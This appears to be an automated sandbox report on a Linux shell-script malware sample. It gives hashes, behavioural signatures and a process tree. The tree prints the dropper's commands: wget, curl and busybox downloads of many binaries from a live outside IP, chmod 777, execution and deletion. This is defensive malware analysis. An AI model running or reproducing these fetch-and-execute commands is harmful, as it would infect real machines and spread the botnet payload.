Analysis
-
max time kernel
29s -
max time network
30s -
platform
debian-9_armhf -
resource
debian9-armhf-20240729-en -
resource tags
arch:armhfimage:debian9-armhf-20240729-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
21/10/2024, 01:29
Static task
static1
Behavioral task
behavioral1
Sample
91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6.sh
Resource
ubuntu1804-amd64-20240508-en
Behavioral task
behavioral2
Sample
91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6.sh
-
Size
10KB
-
MD5
60db2d3af75facb76e7b26b1e552b902
-
SHA1
ffe87d1aca4128607117b4b3939750176984834c
-
SHA256
91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6
-
SHA512
1cf58da38dea71b95213b99089236b11f2f8d85180e3eda12afdd4ff0c3af2c067ffe54c396526178ae292ff8c2a9cc9526f4d2e84af2883ae8e5ccda0d0c05a
-
SSDEEP
192:FaLN9Yb3+USyLey/wkruDzEJ3izEnZN9Yb3cSyLeyZJ:FafUSyLey4guDzEQzEtSyLeyf
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 26 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 809 chmod 859 chmod 865 chmod 877 chmod 883 chmod 897 chmod 702 chmod 803 chmod 909 chmod 722 chmod 746 chmod 772 chmod 815 chmod 835 chmod 847 chmod 678 chmod 686 chmod 827 chmod 841 chmod 853 chmod 755 chmod 797 chmod 889 chmod 903 chmod 821 chmod 871 chmod -
Executes dropped EXE 26 IoCs
ioc pid Process /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c 680 T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F 687 LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 704 rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt 723 LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL 748 PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI 756 lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH 774 MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG 798 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx 804 PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB 810 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW 816 z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW 822 ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst 828 Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI 836 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB 842 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW 848 z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW 854 ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst 860 Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI 866 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI 872 lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH 878 MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c 884 T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F 890 LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 898 rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt 904 LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL 910 PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL -
Checks CPU configuration 1 TTPs 26 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
Writes file to tmp directory 26 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW curl File opened for modification /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB curl File opened for modification /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F curl File opened for modification /tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG curl File opened for modification /tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx curl File opened for modification /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW curl File opened for modification /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI curl File opened for modification /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL curl File opened for modification /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c curl File opened for modification /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 curl File opened for modification /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt curl File opened for modification /tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI curl File opened for modification /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH curl File opened for modification /tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB curl File opened for modification /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst curl File opened for modification /tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW curl File opened for modification /tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst curl File opened for modification /tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c curl File opened for modification /tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F curl File opened for modification /tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt curl File opened for modification /tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL curl File opened for modification /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI curl File opened for modification /tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW curl File opened for modification /tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI curl File opened for modification /tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH curl File opened for modification /tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6 curl
Processes
-
/tmp/91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6.sh/tmp/91633f874780d83ba62e99d291a8dfadf7b2633218a23d3b5a5801c04522feb6.sh1⤵PID:646
-
/bin/rm/bin/rm bins.sh2⤵PID:648
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵PID:654
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:665
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵PID:673
-
-
/bin/chmodchmod 777 T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- File and Directory Permissions Modification
PID:678
-
-
/tmp/T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c./T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵
- Executes dropped EXE
PID:680
-
-
/bin/rmrm T1DoN6kFz2pVVz9xdAtQmBIfPjneJgAp1c2⤵PID:681
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵PID:682
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:684
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵PID:685
-
-
/bin/chmodchmod 777 LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- File and Directory Permissions Modification
PID:686
-
-
/tmp/LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F./LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵
- Executes dropped EXE
PID:687
-
-
/bin/rmrm LYDeoVWL8MW0u2EzdAOCQgAI5BaUeJnK5F2⤵PID:688
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵PID:689
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:692
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵PID:699
-
-
/bin/chmodchmod 777 rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- File and Directory Permissions Modification
PID:702
-
-
/tmp/rpPbXQSsqwMYb1v7YyxwxMStI947794Fs6./rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵
- Executes dropped EXE
PID:704
-
-
/bin/rmrm rpPbXQSsqwMYb1v7YyxwxMStI947794Fs62⤵PID:705
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵PID:707
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:712
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵PID:717
-
-
/bin/chmodchmod 777 LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- File and Directory Permissions Modification
PID:722
-
-
/tmp/LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt./LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵
- Executes dropped EXE
PID:723
-
-
/bin/rmrm LmhhyyaC60aGWjnifJtnCx6mZOh5VSL1nt2⤵PID:724
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵PID:726
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:731
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵PID:741
-
-
/bin/chmodchmod 777 PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL./PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵
- Executes dropped EXE
PID:748
-
-
/bin/rmrm PiYVb2PM5id51L4ViJoxLQwWHBtPYDeaYL2⤵PID:749
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵PID:750
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:753
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵PID:754
-
-
/bin/chmodchmod 777 lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- File and Directory Permissions Modification
PID:755
-
-
/tmp/lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI./lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵
- Executes dropped EXE
PID:756
-
-
/bin/rmrm lekhcGSp3YblazkSjDqXdwuOlJYkQw2tFI2⤵PID:757
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵PID:758
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:761
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵PID:767
-
-
/bin/chmodchmod 777 MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH./MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵
- Executes dropped EXE
PID:774
-
-
/bin/rmrm MyTtubUVibQ0O6fsqwXgCVD4yP4aRx4SSH2⤵PID:775
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵PID:776
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:782
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵PID:788
-
-
/bin/chmodchmod 777 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵
- File and Directory Permissions Modification
PID:797
-
-
/tmp/5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG./5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵
- Executes dropped EXE
PID:798
-
-
/bin/rmrm 5CKo3K5gnwvhtrX3u6wOymHMvKqzGDw8FG2⤵PID:799
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵PID:800
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:801
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵PID:802
-
-
/bin/chmodchmod 777 PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵
- File and Directory Permissions Modification
PID:803
-
-
/tmp/PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx./PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵
- Executes dropped EXE
PID:804
-
-
/bin/rmrm PbwpTDYOlnDgBhcSFldzcUvxM9x053H2Kx2⤵PID:805
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵PID:806
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:807
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵PID:808
-
-
/bin/chmodchmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- File and Directory Permissions Modification
PID:809
-
-
/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- Executes dropped EXE
PID:810
-
-
/bin/rmrm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵PID:811
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵PID:812
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵PID:814
-
-
/bin/chmodchmod 777 z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- File and Directory Permissions Modification
PID:815
-
-
/tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW./z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- Executes dropped EXE
PID:816
-
-
/bin/rmrm z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵PID:817
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵PID:818
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:819
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵PID:820
-
-
/bin/chmodchmod 777 ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- File and Directory Permissions Modification
PID:821
-
-
/tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW./ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- Executes dropped EXE
PID:822
-
-
/bin/rmrm ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵PID:823
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵PID:824
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:825
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵PID:826
-
-
/bin/chmodchmod 777 Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- File and Directory Permissions Modification
PID:827
-
-
/tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst./Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- Executes dropped EXE
PID:828
-
-
/bin/rmrm Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵PID:829
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵PID:830
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:831
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵PID:834
-
-
/bin/chmodchmod 777 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- File and Directory Permissions Modification
PID:835
-
-
/tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI./8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- Executes dropped EXE
PID:836
-
-
/bin/rmrm 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵PID:837
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵PID:838
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:839
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵PID:840
-
-
/bin/chmodchmod 777 JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- File and Directory Permissions Modification
PID:841
-
-
/tmp/JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB./JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵
- Executes dropped EXE
PID:842
-
-
/bin/rmrm JNKoU2jo381tH7Rns2CPU2XLX1agVNnXsB2⤵PID:843
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵PID:844
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:845
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵PID:846
-
-
/bin/chmodchmod 777 z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- File and Directory Permissions Modification
PID:847
-
-
/tmp/z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW./z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵
- Executes dropped EXE
PID:848
-
-
/bin/rmrm z6RU5KaH0vznsIMjsEltZSqABgvN0gKTjW2⤵PID:849
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵PID:850
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:851
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵PID:852
-
-
/bin/chmodchmod 777 ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- File and Directory Permissions Modification
PID:853
-
-
/tmp/ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW./ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵
- Executes dropped EXE
PID:854
-
-
/bin/rmrm ta3jPpSidMjOkanYgfNM6zWVL1Sce8BZzW2⤵PID:855
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵PID:856
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵PID:858
-
-
/bin/chmodchmod 777 Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- File and Directory Permissions Modification
PID:859
-
-
/tmp/Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst./Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵
- Executes dropped EXE
PID:860
-
-
/bin/rmrm Ojqnp5U6jOHe6vpWNHvwOR7UdbJKBBMpst2⤵PID:861
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵PID:862
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:863
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵PID:864
-
-
/bin/chmodchmod 777 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI./8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm 8u1QfhrBTnJbnNJ8EuXdNmcqv8BCBQZ4EI2⤵PID:867
-
-
